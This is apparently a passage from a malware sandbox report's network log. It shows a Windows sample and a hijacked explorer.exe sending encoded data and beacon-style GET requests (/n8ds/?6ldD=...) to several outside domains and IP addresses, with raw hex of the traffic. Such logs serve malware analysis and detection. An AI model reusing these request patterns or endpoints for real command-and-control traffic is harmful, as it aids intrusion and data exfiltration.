32 66 42 36 30 71 73 45 43 76 74 6e 43 69 52 42 4d 59 58 54 55 51 6e 73 4a 5a 63 79 36 55 79 33 4e 4f 2d 62 62 71 2d 33 76 55 75 30 47 47 67 6d 6e 73 38 53 55 36 68 6f 57 36 52 4c 56 48 39 6a 4e 28 75 44 51 65 30 52 6d 38 58 7a 41 41 61 63 5a 4d 4a 51 61 49 31 43 73 68 65 76 46 34 6c 34 65 30 69 39 42 4d 4f 47 59 5a 59 50 67 38 5a 47 6f 64 72 50 6f 32 4d 77 4b 6a 33 70 65 64 49 4c 31 5a 30 32 76 44 37 44 57 31 77 68 54 44 4e 6c 7a 7a 6f 6a 50 46 66 66 79 32 74 6a 75 57 72 76 48 57 42 77 2d 4c 76 78 6d 72 39 64 42 34 53 4b 78 62 43 57 6e 4d 51 31 45 6e 72 6f 5f 78 6c 58 6c 4a 59 4c 69 7a 50 68 49 65 69 6e 44 76 44 59 6a 4a 6e 32 38 43 5a 49 45 30 43 32 53 41 52 77 2d 57 39 69 49 55 68 78 57 47 68 6f 75 38 77 31 7a 39 6f 4d 76 32 5f 53 46 4e 74 72 34 69 6e 38 46 52 41 5a 4f 6d 74 59 42 57 6d 30 6b 53 45 63 73 48 50 33 71 31 4e 6d 33 75 69 54 4b 73 36 57 30 7e 6e 73 67 63 61 72 66 48 54 74 6a 37 2d 70 4a 63 41 7e 68 6f 41 49 43 58 38 44 6b 36 61 7a 7a 77 32 56 38 4b 42 47 6d 76 51 6c 6b 31 64 74 61 68 44 39 6b 35 4c 4a 76 54 70 76 44 47 71 76 4d 39 52 72 41 47 4b 46 4d 38 71 56 42 30 50 4b 4c 4b 58 6a 34 47 45 68 6f 58 67 62 45 7a 39 46 33 6b 4f 5a 36 4b 56 34 50 79 45 28 6c 6a 4c 48 45 6a 5a 32 76 4a 48 69 4f 30 69 5a 55 4b 57 63 67 67 50 7a 76 74 71 51 35 49 57 58 53 38 38 4c 6d 72 75 64 53 44 59 74 33 76 52 4c 36 54 58 77 30 54 7a 33 2d 63 6b 6a 47 53 53 57 63 63 35 4c 67 62 75 63 45 43 58 4a 6e 6f 59 74 42 30 58 76 78 43 52 69 68 62 37 33 34 30 4c 6f 56 6c 4c 48 73 4b 67 50 4c 79 43 53 48 46 36 6c 4d 28 70 41 53 63 6e 7e 55 51 39 78 37 48 79 37 45 34 58 7e 44 36 58 34 38 71 42 4e 51 64 4d 73 59 64 71 64 38 68 59 51 61 63 33 51 36 41 44 6b 5a 59 66 53 63 58 52 52 6d 58 4f 38 34 45 6a 59 67 4a 63 4c 69 45 31 71 6b 44 39 48 4b 70 39 41 57 78 7a 4c 68 5a 48 70 39 62 30 61 58 49 56 65 79 5a 50 39 6d 58 5a 74 64 6a 4c 4c 73 28 4f 34 39 75 77 41 4a 43 69 54 36 78 4b 46 68 69 38 64 76 44 62 6d 53 35 58 52 4d 4b 67 66 67 50 34 62 65 38 4c 71 6d 33 5f 4e 76 6b 32 37 62 50 7a 75 57 28 74 48 71 4a 54 73 34 30 49 38 49 79 76 78 77 38 6e 67 67 47 76 53 5f 56 71 75 49 78 69 4c 69 53 53 57 48 35 79 77 4b 58 64 4a 56 66 77 75 50 71 56 54 45 6d 6b 4e 33 7a 31 73 34 33 4b 71 76 7e 49 58 5f 58 6a 6d 54 52 47 76 51 42 70 66 69 4d 77 49 69 69 73 68 62 62 77 65 42 59 79 54 43 7e 6b 4f 75 32 6b 38 68 67 64 57 67 4d 30 63 46 28 6a 4d 2d 45 75 63 64 52 4e 48 51 44 51 44 49 6f 54 5a 44 4f 71 56 54 50 58 77 63 77 55 4e 49 7e 55 78 58 55 45 5a 42 56 42 59 41 64 58 41 4b 6a 30 57 58 4b 32 74 68 71 35 64 6a 4e 70 4f 4b 50 33 71 77 52 64 35 51 4d 56 52 37 43 31 5a 7a 36 4b 55 59 6d 39 69 6b 77 62 75 62 41 73 65 77 6f 70 5a 35 28 55 31 79 77 77 7a 41 6b 79 74 48 38 52 69 62 73 4b Data Ascii: 6ldD=uR2Xx7hVX_bPK-jD03cJP6UCyu8VNwCuO-MAFm~251~bN5RJURSPiYxmNoJVtLUg0zR7juSx4iY-GRBGYrc-33cIGI0YUy~jbWzp~uXActzM2ly9Ul08(N4V(2AWwIDLb5z_S147fqE4k-VLxEgjIMTdm6qoa8E03sS3oqrkS21fZWGPahAXS4SBXFXRkd~jajZAzIe4nCGhwd5B2dRte7kjixNbXjSTXRN-hq7CDPxFjCyXxdZuwZZFX2kpwGu3tGQkQzT87H8nqaaeue4esRLWggjty7hR4eGFDvTH(1uxCSQc0Xd4DTG2dbYOTeTutGs1Es08C8S-9kbW2RvfVOPtJBPxhoHKAjOVNRFgNRaqXQIB363YDDl9sK58Cv~fX6Bc17LL8ZT_~tAFQXLdcsyVpoHUR1~P1bmou2j2w0VebIO9sOwmswDCiLoxHvn-dnDoTfOJyV52fB60qsECvtnCiRBMYXTUQnsJZcy6Uy3NO-bbq-3vUu0GGgmns8SU6hoW6RLVH9jN(uDQe0Rm8XzAAacZMJQaI1CshevF4l4e0i9BMOGYZYPg8ZGodrPo2MwKj3pedIL1Z02vD7DW1whTDNlzzojPFffy2tjuWrvHWBw-Lvxmr9dB4SKxbCWnMQ1Enro_xlXlJYLizPhIeinDvDYjJn28CZIE0C2SARw-W9iIUhxWGhou8w1z9oMv2_SFNtr4in8FRAZOmtYBWm0kSEcsHP3q1Nm3uiTKs6W0~nsgcarfHTtj7-pJcA~hoAICX8Dk6azzw2V8KBGmvQlk1dtahD9k5LJvTpvDGqvM9RrAGKFM8qVB0PKLKXj4GEhoXgbEz9F3kOZ6KV4PyE(ljLHEjZ2vJHiO0iZUKWcggPzvtqQ5IWXS88LmrudSDYt3vRL6TXw0Tz3-ckjGSSWcc5LgbucECXJnoYtB0XvxCRihb7340LoVlLHsKgPLyCSHF6lM(pAScn~UQ9x7Hy7E4X~D6X48qBNQdMsYdqd8hYQac3Q6ADkZYfScXRRmXO84EjYgJcLiE1qkD9HKp9AWxzLhZHp9b0aXIVeyZP9mXZtdjLLs(O49uwAJCiT6xKFhi8dvDbmS5XRMKgfgP4be8Lqm3_Nvk27bPzuW(tHqJTs40I8Iyvxw8nggGvS_VquIxiLiSSWH5ywKXdJVfwuPqVTEmkN3z1s43Kqv~IX_XjmTRGvQBpfiMwIiishbbweBYyTC~kOu2k8hgdWgM0cF(jM-EucdRNHQDQDIoTZDOqVTPXwcwUNI~UxXUEZBVBYAdXAKj0WXK2thq5djNpOKP3qwRd5QMVR7C1Zz6KUYm9ikwbubAsewopZ5(U1ywwzAkytH8RibsKcEmA32gWPRYcjmrePvorv6bbhfBrXFXy994PUj1QSBttvtwJDpiAWlU4XYEQVevxWwiOCwPdu-EZZ5KvKxeTz85fLBoquGm2PYkAVBd-m62EUyI0dtcP9KFHW67FcnrJYtYMnqHl0o(wDSm4isGlva5HRqhlZCqIG8fHObMaHQGtkDJboegdsu63dYd8YjVq6lTKZqg_qzESLquTb4eW9qIfiG8x652xZaqyuPc3R8cC2aZ3uYg7(hL7bO1IUbVvSL962MXHmn7U8-4j2pBbyNjbJEK_LQzIZfRDx2m51YFK8EOa8lFBfYXqVfZLGrOZuDGJoVVkmq1k4Qw8wUgQk87gFENk(CYnIkCaqcamOb~czXDW0EyHff7oYxIEfaWQsocrRXO6xjxIoaKNGsF-DC~-bppdBykgumTy62Ibd4OFPIHleAERWYhp972DmfmV2CfZFZ0ntbVhzian0MqdzkGh~cyHy0arfQHpTNOtKFHglNlprU05ROfSgBGpcJOUAyjQd3IUQRLT99ZkyxqAF8L11vzglotKZpxthL9Eu8KfNQk6oJiqNrfwtwxr9CC4zzL0Y_jey7HYydE92gvrSE2eKRX9VhHgTwN0TDz3DLydvHa0M8Pf71y9JZra7QWPqmlMGraM6Cyto2wQaVVvLqoZdtokptN8lIAoiKg7k91F4GW6a63iApDik1LFeXSglfQ-lNfC2s0tW_Pm7T6PfC90~kZQdSgLVtOWN_ZIqT4mjMjBxJJymT7JodskrLQz6P5a1FZpIXgPVI7jseSRDthBPt1ccUGVBjEhFZ11vOHHXtaj4cJ2ruiNbM2coZ3weryWvZkcy6d_2jPqvigWCwV-G0qB8ISM2OpMjtZLIytE9aup0PN3E69QszL6F8WFTx6iTYXu670hgO1x71nArfFAj61piOfYvXGJkLE-SC3_7syo7wZeWeO3Yyso7kVZE2v7V4p7RjnSQbbgLOQ-VOvLc-hrhRvHPxF2VttHitf69tigyU2fML1Yt1mBMu(FTDGUEqCMXXjSfQPiIv5G5dLt7PL7ctuEk2mfvaaGLKL_2Af9kPTCagGBEy7ufzjyTHuEZ-7u7ufBdyQrNT(OPNSQWVy1r9g6KpvO3QMc2_LEjvNYGDxEH5AqHqxeeoJTDReHRPFxKH5_Wf8kBUITV05qu2ZkbhyoL0mKZ415Jro7I1l12bYh0qX5(w6VlJiCyt2LvV7NtdlC(MZDYkZlq8WuC_TBW5uK810z2gww5IPC8nrQNAuf(1Dig2pXAY7z7Y8mCLTvhsOeXqPapFav972k5o9SoH7eIy7UWZMCg8svpEB_PRLP5KrhRj~cacnNtjhUM0CwCZsTORgptVdSWr0abTiDPaZ2moVvr4QvVDmaCOAa81VDh5pcLDefoCaAZNhiyUkl(8emobAKvavXBe1Ec7B_uhtPggn5B16lKQO2leOKtNdddb8kz9TH1KpAWXl6hFTRfVd9kbd-zHDvGrKGdHQv7k7rcJ~lrTdGwuIVWaz2MrkdAawZNHDZAK9C2e(1wMhSdI8G6MVDSnokRjKVJBwjpVPtlhO8uqDL7XjSxLelz51dYQmoWLxDztjGAzvA4UjTpqHQi4x5X4Qk~vn17w7FRqzfKE2nknbg9GzdLqoBwD(4AnYjmy1RWte5DAHWMjwysDLfIJW2TG6XDhK-hmn7awIYWZ28kG4L5KvHmhAt8nDT1wFaABXVfV(ABONv6MP2nLZUnT3ghD(dw_eKoJJ23sqtsbNtb2(bOunzPuteaLHouqefZ7(5ulN49BPZIQaU1FAz3ZHzmmjrlOgrfUvtyg9qXVpvZNhS1X~6V6L_4f(lUyL4yOiTF9bI8iNFX7hAzR5j(zZzObC0~wjXe2zDPY0CTPYiphE8BShAq0xZw5oT0IHl5oDRxAgDfMKoMSSYIVAS0T9Qs3YGs-lInLBLsrcQ71qb(vjlD-dP(jB9T_7hRsVpVSWKe1RkNTIwydg_QDpOLASHLsmTMIPOZPP5SiKS47AdQjLRdSby5TiK~nIyyfS4x0fDFsNZbSGlq9Z4I28kvQnYQrNbWRAXLAwiBjKTR26_rNbe1_ky673nZtM6BT7I9Kfa(Kph3LpgC83soLtFpeFh8EF4UmzQQivdRvKjL4jhlsWsphoa3fIeLnxok1EEwJ(cxiy2QkwY4n5MBbKSHIV_voB2wFb6dADzWc60a_bINyjM~DoQ9GNlZe29biXwpPyO1kRJy55Nj9RmJcNEldYwmRavQ5mbqbay9rhpwX0-PTp4HuqtSiXa4hPqNy9IyRSDmEa_gUX4(K3K1fi6fIAiXNUc0Sma9Udp2caHPCti1yUOEjaYIrMSEnJFi4NDk_wElzRnilI8eBgg7EJXhN7yMb7FiBaUdu08c_D30gMd4VdXW_unlbqzjcQWTKYFSdY2EoLUo2VyEWq6L0(lc67f9QF6cywnv5qiglodXc4nnv5LT31aJCwAL2F4T7oMdt01McBcW5zU7ZZ7wKwMyMhB9yDF2uAEsCu1b-OW4xgGCMtX6gD6memE0_TV6Glxe4(QjkjshqUtK0lry0Kh(tnq5Szg6yWr2YgVhnoddSVtTa56PY2R6IcMIP~Vpkta3iPy7LShLTF67PfZo6Tn4JXF~QhsVOUye7w6s-HBDfdLgdGKXKocpR0ev0i5SxRZ48wru3qhDR7Ju6Fbku9NdFi8KOe9vUv5oPngkjs9no(
Nov 25, 2021 13:01:15.913800955 CET	6726	OUT	Data Raw: 5a 62 50 4f 31 4e 72 6d 38 4c 72 6f 33 6b 55 4c 7e 33 58 51 6e 4e 32 6a 64 33 7e 41 34 41 6d 34 4b 2d 71 57 55 64 57 64 67 4b 44 70 79 77 43 75 41 66 53 48 7a 33 71 49 79 59 66 4d 6f 33 43 76 44 39 50 41 49 42 6b 61 4a 73 4b 6b 43 52 37 32 6f 4f Data Ascii: ZbPO1Nrm8Lro3kUL~3XQnN2jd3~A4Am4K-qWUdWdgKDpywCuAfSHz3qIyYfMo3CvD9PAIBkaJsKkCR72oOZl1nAc9l33yFjQ9DHfIVQIVxK0~3g-gKdeB3DaRmL6Pi~Nq6HxCm8crdNcI9dtT9eC8a3nDs0nuBwlmpBchc9093(PyRps(9P52-oGN8wfpkPWg1mP2EUy~Nqd(Bxya-Eb94PqBPl3gZbwSNPtqDhobREKxxj5qnC
Nov 25, 2021 13:01:16.195851088 CET	6729	OUT	Data Raw: 61 67 47 65 58 2d 28 30 4e 36 51 44 76 31 7a 6a 4b 63 64 5f 70 38 6d 65 57 66 67 79 51 79 35 33 49 6c 6a 74 4c 38 32 64 47 4c 51 5f 54 32 28 4d 49 6c 6d 34 50 49 65 79 6d 7a 7e 41 77 38 71 52 6f 52 66 75 41 37 33 79 7a 68 44 76 76 79 4f 33 38 31 Data Ascii: agGeX-(0N6QDv1zjKcd_p8meWfgyQy53IljtL82dGLQ_T2(MIlm4PIeymz~Aw8qRoRfuA73yzhDvvyO38196iZmqeaRnv1TjltLPrXpscHOCBSiBriN8jkZuGDDojEyLgxn4SFy4DvJIDqQZDyC_S2fU4ArK(d~IkNXTAqjx4hqWOkOz8NIIO2~2JClHf0J6A_piir(3VO81xtsJXVkwlxg2l8ukw7f4ysKfRuqRZev64EgBsB~
Nov 25, 2021 13:01:16.195983887 CET	6734	OUT	Data Raw: 67 53 47 65 30 79 38 37 64 39 32 30 6d 72 32 42 34 2d 65 6d 5a 78 33 76 51 42 4c 77 44 73 54 57 4c 7a 33 57 45 36 28 41 30 6d 74 46 68 74 43 5a 7a 69 74 2d 45 37 52 49 32 79 58 48 4e 2d 6e 67 58 76 68 71 35 70 39 53 42 4f 5a 61 68 71 50 46 6b 67 Data Ascii: gSGe0y87d920mr2B4-emZx3vQBLwDsTWLz3WE6(A0mtFhtCZzit-E7RI2yXHN-ngXvhq5p9SBOZahqPFkg5-a8kRUxy8BoChzIDG10BYTvebm2O_mxxcRbJuLdtSWY3S3H8zDwFZJ0Ly~W6ehrfp0DBQ~GNzWzBpW22zEV0Kd2WmbcwzE5hmfxbfhJJVph799F1sQuxLCv89CBtBiuVbjEalWwakb85v4tSUdc(W6c02do7WtUn
Nov 25, 2021 13:01:16.196217060 CET	6745	OUT	Data Raw: 45 4c 34 69 6d 73 4b 35 69 54 5a 65 4c 4d 57 2d 4c 34 53 42 79 71 43 55 58 6e 76 6f 43 36 49 50 50 45 43 79 63 72 45 38 33 42 42 6a 59 6e 46 37 45 73 32 48 6e 6f 7a 76 4d 37 6d 7a 75 39 31 42 62 59 33 6f 4c 64 4b 59 45 48 74 34 74 37 59 50 61 54 Data Ascii: EL4imsK5iTZeLMW-L4SByqCUXnvoC6IPPECycrE83BBjYnF7Es2HnozvM7mzu91BbY3oLdKYEHt4t7YPaTDc~KXExOJoOnGAF-SO21G1Hr8nGe09ThtK(cLqscfW0HRBi9LHsZRtDBsELHyQoZ16ua5QcbgoRaGXdXh6mzMOoRc4v26apEdaf1xHwGgDcSKMGTDKN_VuRdJpJf5ea-rNk1WnuVLGXJD39Oi3Iresta5cojbJl8C
Nov 25, 2021 13:01:16.196336985 CET	6753	OUT	Data Raw: 58 47 64 68 6b 6b 39 50 61 58 31 57 33 74 33 63 47 6a 47 58 43 58 4f 64 78 77 71 53 76 33 47 43 39 6a 71 6e 6f 4a 64 59 70 54 41 38 53 6a 4e 48 35 4d 37 31 41 4c 43 48 61 2d 4e 46 74 39 35 70 38 56 48 53 36 4f 54 67 47 79 66 4f 69 56 78 37 6e 66 Data Ascii: XGdhkk9PaX1W3t3cGjGXCXOdxwqSv3GC9jqnoJdYpTA8SjNH5M71ALCHa-NFt95p8VHS6OTgGyfOiVx7nfhl~9tbOJM8MUtpeuUj9EX42FKeJYJvTgiQTfyvniikn7l_U8kqHQ4WA83syceO0TTFQ58Gpc2pOQFiklUhUTu4B2IzXZq02lNEzCFPUxP6slFbIsEjBb1-9mT_OUf89RVDPUoQT7XVD4Fnhu22qw5qES4pqu0qs5z
Nov 25, 2021 13:01:16.475429058 CET	6756	OUT	Data Raw: 37 48 65 4a 34 2d 74 58 28 42 74 6a 68 69 6c 58 6f 7a 51 47 48 5a 58 47 65 54 4c 64 76 5f 64 34 35 78 45 54 5a 66 55 68 7e 6d 36 53 39 38 31 5f 5a 65 72 6d 4e 6e 44 5f 33 48 73 61 4f 57 6f 34 47 4a 50 7a 51 62 69 78 36 52 6e 30 67 6c 64 70 67 44 Data Ascii: 7HeJ4-tX(BtjhilXozQGHZXGeTLdv_d45xETZfUh~m6S981_ZermNnD_3HsaOWo4GJPzQbix6Rn0gldpgDIiHWBLApfCIaatZJjMGpIH~vaYjiWL2daeuJ6ELkOrSgbzTYICICzGJILF1z~p4xBI9zesDHSAO81W2Wxk9J71kHDJw9e6nPpBikCIHeUABrp_WSL8l5s1oM3byS20WV1NzsZSWcus8Q4Uqaci0jYvl-JsCzKuHdr
Nov 25, 2021 13:01:16.475545883 CET	6759	OUT	Data Raw: 4d 46 36 44 68 67 77 51 35 4b 6c 63 62 61 66 53 6c 78 45 6e 43 38 6e 2d 37 53 4e 41 66 50 73 58 53 79 4b 54 34 4b 55 67 64 52 57 6a 73 5f 65 52 48 66 76 4f 55 57 56 65 33 31 7e 72 6f 75 65 70 54 34 28 75 46 57 76 75 6c 48 48 32 47 62 33 4c 56 4c Data Ascii: MF6DhgwQ5KlcbafSlxEnC8n-7SNAfPsXSyKT4KUgdRWjs_eRHfvOUWVe31~rouepT4(uFWvulHH2Gb3LVLWZdZ7sSu63zwRxJ48sIdVfntSorFqmDdlZvjAE0Dk-Ku3oE80LDguMb-AswCG-IQgsTnLvOHsr6VrP8aL8ayxtqNpUaCzXmfxmmvgRIouV2-5aI3GRAgLIGnDQ52TJvJgtXxPnZvqHSrPKzF9d98nfqGVGETnq8pC
Nov 25, 2021 13:01:16.483793020 CET	6762	OUT	Data Raw: 74 62 32 7a 34 52 63 66 4c 35 4e 48 41 78 36 4a 6b 76 52 61 6d 66 59 69 56 4f 48 34 4b 49 53 6a 74 35 35 4a 4b 49 53 46 74 4a 38 6f 55 70 42 35 54 44 70 53 6c 31 4e 66 69 6b 59 67 6d 75 6c 72 77 53 54 74 6e 76 4b 78 57 44 62 37 6b 57 6d 7a 4b 2d Data Ascii: tb2z4RcfL5NHAx6JkvRamfYiVOH4KISjt55JKISFtJ8oUpB5TDpSl1NfikYgmulrwSTtnvKxWDb7kWmzK-9vBJrkrRFNSNM_5mZtzEv2mt4aH42AlSeXUVIi1ItXuaoBckvC4H7eqjY1Aacagmxor16ftryeq_5ptqhTDc1jJBCEq8UjElUbsvS6VNi_jr5G55ONb3YGv1UeavFXckxh86xLQwnzkx5akzLFpdsMMqlNvBnwj0W
Nov 25, 2021 13:01:16.483922005 CET	6764	OUT	Data Raw: 49 37 45 51 4c 64 77 50 49 31 36 73 57 57 59 78 75 6c 63 73 6b 6e 6d 6e 31 2d 44 42 77 61 50 2d 6f 50 44 4c 6f 36 62 47 45 65 71 4d 53 79 74 78 6c 58 67 42 30 69 37 5a 67 74 79 6f 33 6c 52 50 78 65 66 68 32 4e 63 54 68 61 55 63 43 56 79 36 68 36 Data Ascii: I7EQLdwPI16sWWYxulcsknmn1-DBwaP-oPDLo6bGEeqMSytxlXgB0i7Zgtyo3lRPxefh2NcThaUcCVy6h64GVNtSsGgjFSYlpWxsiK1dWJr8vwkRZNEqGtVT9Gpvg8dhn_YQd-IfSkzwLvZDCSSOtF(5R05mAbPjYOYqlJDPRcBs2j064wix5PvnUELA0XJxmDCBo0T-werlZqDtmsIKo0W4mcsLsuXhVgQDIWj0Nb0YToDARev
Nov 25, 2021 13:01:16.484146118 CET	6775	OUT	Data Raw: 51 56 66 35 38 53 61 6e 49 49 6b 47 28 59 6b 51 73 79 63 46 28 6b 74 56 33 31 53 73 56 32 6b 72 52 54 74 4a 69 4c 43 5f 58 32 46 4b 48 6b 66 34 47 78 39 59 57 4a 51 61 68 50 66 56 73 75 6b 50 64 38 69 57 31 39 7a 5f 37 42 6b 65 70 79 31 30 43 61 Data Ascii: QVf58SanIIkG(YkQsycF(ktV31SsV2krRTtJiLC_X2FKHkf4Gx9YWJQahPfVsukPd8iW19z_7Bkepy10CarraH0UXyfy8-uHUUSd9E2cqi5cAWB-psEkXodlLt1aA30pHMMLWm1aWuzUBgXAmAiVRiNc2LLa5bDT7Pr2~ezjTTiPMsCuOC(XiuxlKhno2Map0sQwdJEX3bFhmfI4gv(b0I(ingR598pcrepw8rwCXe0PqYzEHo5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.11.20	49839	203.170.80.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 13:01:16.189246893 CET	6726	OUT	GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49841	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49815	104.21.76.223	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:56:13.220035076 CET	6421	OUT	GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1 Host: www.topwowshopping.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:56:13.382391930 CET	6422	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2021 11:56:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0 expires: 0 last-modified: Thu, 25 Nov 2021 11:56:13 GMT pragma: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wftVfpJA1zZJwjRaaheNSQN%2B47kW8NUpVPnztY9X9CDRJcJK3cSrWrr%2Fkh12oU%2BPDjaHHxgPOGqNMJdKZBB2VmnTOlRI%2FV3g8s4dK2XbZbitRDqmmAxJtUHBGjKUUJ1RfXt9WyadqG7lXv0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b3ab146a9874e37-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found
Nov 25, 2021 12:56:13.382405996 CET	6422	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49816	81.2.194.128	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 12:56:28.546938896 CET	6423	OUT	GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1 Host: www.growebox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 12:56:28.576894045 CET	6425	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 11:56:28 GMT Server: Apache Content-Length: 3011 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 72 65 67 69 73 74 65 72 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 30 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 4f 52 50 53 49 20 6a 65 20 45 76 72 6f 70 73 6b e1 20 68 6f 75 73 69 6e 67 6f 76 e1 20 73 70 6f 6c 65 e8 6e 6f 73 74 2e 20 4e 61 62 ed 7a ed 20 73 6c 75 9e 62 79 20 77 65 62 68 6f 73 74 69 6e 67 75 2c 20 73 65 72 76 65 72 68 6f 73 74 69 6e 67 75 2c 20 72 65 67 69 73 74 72 61 63 65 20 64 6f 6d e9 6e 6f 76 fd 63 68 20 6a 6d 65 6e 20 61 20 77 77 77 20 73 74 72 e1 6e 6b 79 20 6e 61 20 73 65 72 76 65 72 65 63 68 20 57 69 6e 64 6f 77 73 2f 4c 69 6e 75 78 2e 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 72 70 73 69 2c 77 65 62 68 6f 73 74 69 6e 67 2c 64 6f 6d e9 6e 61 2c 64 6f 6d e9 6e 79 2c 68 6f 73 74 69 6e 67 2c 73 65 72 76 65 72 2c 73 65 72 76 65 72 68 6f 73 74 69 6e 67 2c 68 6f 75 73 69 6e 67 2c 73 65 72 76 65 72 68 6f 75 73 69 6e 67 2c 61 64 73 6c 2c 77 69 66 69 2c 77 69 2d 66 69 2c 64 6f 6d 61 69 6e 2c 64 6f 6d 61 69 6e 73 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 32 35 34 39 63 3b 0d 0a 7d 0d 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 23 62 6f 78 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 74 6f 70 3a 20 31 36 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 69 6d 67 2f 6c 6f 67 6f 5f 66 6f 72 70 73 69 2e 67 69 66 29 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 6c 65 66 74 20 74 6f 70 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 33 38 35 30 36 62 3b 0d 0a 7d 0d 0a 23 62 6f 78 32 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 32 30 70 78 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 Data Ascii: 